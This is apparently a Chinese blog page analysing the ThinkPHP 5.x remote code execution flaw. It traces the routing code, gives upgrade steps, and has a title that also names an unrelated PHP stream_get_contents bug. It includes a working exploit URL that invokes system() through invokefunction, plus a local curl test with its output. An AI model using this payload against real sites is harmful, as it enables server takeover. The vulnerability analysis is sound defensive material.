php stream_get_contents拒绝服务漏洞,ThinkPHP 5.x 远程代码getshell漏洞实战分析

最新推荐文章于 2023-03-31 08:49:35 发布
最新推荐文章于 2023-03-31 08:49:35 发布
阅读量242 收藏
点赞数
文章标签: php stream_get_contents拒绝服务漏洞

ThinkPHP 简介

ThinkPHP 是一个免费开源的,快速、简单的面向对象的轻量级PHP开发框架,因为其易用性、扩展性,已经成长为国内颇具影响力的WEB应用开发框架

漏洞解析

漏洞引发的原因是框架对控制器名没有进行足够的检测,现拉取ThinkPHP v5.0.22 来进行测试

请求路由

=> http://127.0.0.1/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l

系统解析为

=> 模块:index

=> 控制器:\think\app

=> 方法:invokefunction

=> 参数列表:

=> function=call_user_func_array

=> vars[0]=system

=> vars[1][]=ls -l

跟踪到路由解析代码 thinkphplibrarythinkApp.php

/**

* 执行模块

* @access public

* @param array $result 模块/控制器/操作

* @param array $config 配置参数

* @param bool $convert 是否自动转换控制器和操作名

* @return mixed

* @throws HttpException

*/

public static function module($result, $config, $convert = null)

{

// ======================================================

// 未进行过滤直接以 / 分解来进行解析

// ======================================================

if (is_string($result)) {

$result = explode('/', $result);

}

...

// ======================================================

// 未进行过滤直接赋值为 $result[1] 即 \think\app 并进行实例化

// ======================================================

$instance = Loader::controller(

$controller, // \think\app

$config['url_controller_layer'],

$config['controller_suffix'],

$config['empty_controller']

);

...

// =========================================

// 传递 $result[2] 即 invokefunction 方法

// is_callable([$instance, "invokefunction"]

// =========================================

if (is_callable([$instance, $action])) {

// 执行操作方法

$call = [$instance, $action];

// 严格获取当前操作方法名

$reflect = new \ReflectionMethod($instance, $action);

$methodName = $reflect->getName();

$suffix = $config['action_suffix'];

$actionName = $suffix ? substr($methodName, 0, -strlen($suffix)) : $methodName;

$request->action($actionName);

...

return self::invokeMethod($call, $vars);

...

/**

* 调用反射执行类的方法 支持参数绑定

* @access public

* @param string|array $method 方法

* @param array $vars 变量

* @return mixed

*/

public static function invokeMethod($method, $vars = [])

{

if (is_array($method)) {

$class = is_object($method[0]) ? $method[0] : self::invokeClass($method[0]);

$reflect = new \ReflectionMethod($class, $method[1]);

} else {

// 静态方法

$reflect = new \ReflectionMethod($method);

}

$args = self::bindParams($reflect, $vars);

// ===============================================

// 传递uri参数

// var_dump($args);

// --------------------------

// array(2) {

// [0]=>

// string(20) "call_user_func_array"

// [1]=>

// array(2) {

// [0]=>

// string(6) "system"

// [1]=>

// array(1) {

// [0]=>

// string(5) "ls -l"

// }

// }

// }

// ===============================================

self::$debug && Log::record('[ RUN ] ' . $reflect->class . '->' . $reflect->name . '[ ' . $reflect->getFileName() . ' ]', 'info');

// =======================================================

// 即通过 invokeFunction 传递系统调用给 call_user_func_array

// 从而调用 system("ls -l")

// =======================================================

return $reflect->invokeArgs(isset($class) ? $class : null, $args);

}

...

/**

* 执行函数或者闭包方法 支持参数调用

* @access public

* @param string|array|\Closure $function 函数或者闭包

* @param array $vars 变量

* @return mixed

*/

public static function invokeFunction($function, $vars = [])

{

$reflect = new \ReflectionFunction($function);

$args = self::bindParams($reflect, $vars);

// 记录执行信息

self::$debug && Log::record('[ RUN ] ' . $reflect->__toString(), 'info');

return $reflect->invokeArgs($args);

}

漏洞测试结果

# curl "http://127.0.0.1/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=ls%20-l"

total 13

-rw-r--r-- 1 pc-user 197121 850 Sep 7 21:33 favicon.ico

-rw-r--r-- 1 pc-user 197121 766 Sep 7 21:33 index.php

-rw-r--r-- 1 pc-user 197121 24 Sep 7 21:33 robots.txt

-rw-r--r-- 1 pc-user 197121 840 Sep 7 21:33 router.php

drwxr-xr-x 1 pc-user 197121 0 Dec 26 22:18 static

受影响版本范围

ThinkPHP 5.0.x < 5.0.23

ThinkPHP 5.1.x < 5.1.31

大家看一下相关链接中github版本列表,参考github release列表的更新内容,选择对自己升级影响最小的,最好的话就是直接升级到最新版本,要想不受漏洞影响,至少应该升级为

ThinkPHP 5.0.23

ThinkPHP 5.1.31

composer require topthink/framework=v5.0.23

composer require topthink/framework=v5.1.31

升级后确认版本已更新

# composer show topthink/framework

name : topthink/framework

descrip. : the new thinkphp framework

keywords : framework, orm, thinkphp

versions : * v5.0.23

type : think-framework

...

相关链接

名字不好写
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
PHP Stream 常用函数
lyn1772671980的博客
09-25 957
1.stream_get_contents—读取资源流到一个字符串 stream_get_contents(resource$handle[,int$maxlength= -1[,int$offset= -1]] ) :string 与file_get_contents()一样,但是stream_get_contents()是对一个已经打开的资源流进行操作,并将其内容写入一个字符串返回。 返回的内容取决于maxlength字节长度和offset指定的起始位置...
php stream_get_contents,PHP stream_get_contents 用法 手册 | 示例代码
weixin_34588509的博客
03-17 811
vasiliy at hotger dot comIt is important to know that stream_get_contents behaves differently with different versions of PHP. Consider the following$handle=fopen('file','w+');// truncate + attempt to ...
php ssh2远程登录防火墙报错PHP Warning: stream_get_contents(): Failure ‘transport read‘ (-43)
jxyk2007的专栏
04-01 1161
问题:原因防火墙策略未设置好 【原创】php ssh2 远程秘钥登录华三防火墙F5030_三块钱0794的博客-CSDN博客1.客户端生产秘钥文件[root@model /]# ssh-keygen -t rsa -P '' Generating public/private rsa key pair.Enter file in which to save the key (/root/.ssh/id_rsa): Created directory '/root/.ssh'.Your ident.
php stream_get_contents,php file_get_contents() 函数
weixin_35851553的博客
03-17 340
file_get_contents()(PHP 4 >= 4.3.0, PHP 5, PHP 7)file_get_contents — 将整个文件读入一个字符串说明file_get_contents ( string $filename [, bool $use_include_path = false [, resource $context [, int $offset = -1 [,...
php 解析文件流,PHP: stream_get_contents - Manual
weixin_28786193的博客
03-10 461
/** problem: stream_get_contents blocks / is very slow.* I have tried* 1: stream_set_blocking, doesn't make a difference.* 2: stream_get_meta_data['unread_bytes'] = ITS BUGGED, ALWAYS SAYS 0.* 3: feof...
ThinkPHP v5.x命令执行利用工具(可getshell
11-19
在这个场景中,"ThinkPHP v5.x命令执行利用工具(可getshell)"指的是一个专门针对ThinkPHP v5.x版本的安全漏洞进行利用的工具,该工具能够使得攻击者通过命令执行漏洞获取服务器的shell访问权限。 命令执行漏洞...
Thinkphp 5.0.x_5.1.x 变量覆盖 RCE 漏洞分析1
08-03
### ThinkPHP 5.0.x/5.1.x 变量覆盖远程代码执行(RCE)漏洞分析 #### 漏洞概述 ThinkPHP 5.0.x 和 5.1.x 版本中存在一个变量覆盖导致的远程代码执行(RCE)漏洞。该漏洞利用者可以通过对特定HTTP请求参数的精心...
thinkphp5.X-Batch-getshell-master.rar
03-31
"thinkphp5.X-Batch-getshell-master"这个项目名暗示了该压缩包包含的是针对ThinkPHP5.x框架的批量getshell攻击方法集合,可能包括了不同版本的PoC(Proof of Concept)代码,用于演示和验证这些漏洞的存在。...
PHPstream_get_contents offset=-1的一个大坑
卧龙居
02-28 4654
首先,stream_get_contents的参数为: resource length=-1 offset=-1 如果你认为stream_get_contents(resource)使用默认参数时,offset一定会默认从0开始就错了,如果resource相同的话,offset会从当前位置开始。 比如: a = stream_get_contents(resource)  会从0开始,
ThinkPHP 5 中Request file_get_contents(php://input) 探究
Zsd
11-07 9359
TP出了新版5.0.2 作为一个TP的老用户,当然需要研究研究了,在学习TP5的请求与响应时发现了TP一个特别有意思的类Request请求类。在构造方法类中看到今天的主人公 php://input 这个东西。先做一个标题党,不去研究TP5的Request类了,就研究清楚这个 php://input 就OK。毕竟本人之前未使用过这个协议。
php stream_get_contents,PHP: stream_get_contents - Manual
weixin_33897085的博客
03-17 107
/** problem: stream_get_contents blocks / is very slow.* I have tried* 1: stream_set_blocking, doesn't make a difference.* 2: stream_get_meta_data['unread_bytes'] = ITS BUGGED, ALWAYS SAYS 0.* 3: feof...
thinkphp6+redis stream消息队列
yftyzs的博客
10-15 973
thinkphp6+redis stream消息队列
thinkphp+js模拟ChatGPT逐字打印的效果踩坑指南
毕竟我是大神的博客
03-31 5116
thinkPHP使用EventSource实现ChatGPT逐字打印效果报错EventSource's response has a MIME type ("text/html") that is not "text/event-stream". Aborting the connection.解决方案
php stream_get_contents拒绝服务漏洞,CVE-2018-7584
weixin_39875832的博客
03-13 522
Description:------------The latest PHP distributions contain a memory corruption bug while parsing malformed HTTP response packets. Vulnerable code at:php_stream_url_wrap_http_ex /home/weilei/php-7.2....
PHP 使用 stream_get_meta_date ,stream_get_contents 获取网页内容
____
11-18 4922
PHP 使用 获取网页内容: if (! preg_match('@^https?://@', $url)) { die('HTTP(s) only.'); } $httpOpts = array( 'max_redirects' => 0 ,'timeout' => 3 ); if ($ua !== '') { $httpOpts['user_ag
PHP Warning: file_get_contents failed to open stream解决办法
热门推荐
打杂人
05-10 3万+
file_get_contents函数在获得远程文件时提示Warning: file_get_contents failed to open stream,希望例子能够帮助到各位,希望例子能够帮助到大家。 在做项目时用 file_get_contents 来获取数据,php 报错  PHP Warning: file_get_contents failed to open stream: n
file_get_contents($url) stream_get_contents($stream)
autumn20080101的专栏
04-06 661
http://www.w3.org/TR/html4/loose.dtd">     get_contents.php             $url='http://localhost/myphp/StrPrice.html'; $contents=file_get_contents($url) or die('file_get_contents f
thinkphp5.x 漏洞 修复
最新发布
10-30
修复ThinkPHP 5.x漏洞可以从以下几个方面入手: 1. 更新最新版本:保持框架的版本更新是修复漏洞的首要措施。ThinkPHP团队会不断发布更新版本来修复漏洞和增加新功能,因此及时更新到最新版本是必要的。可以在官方...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值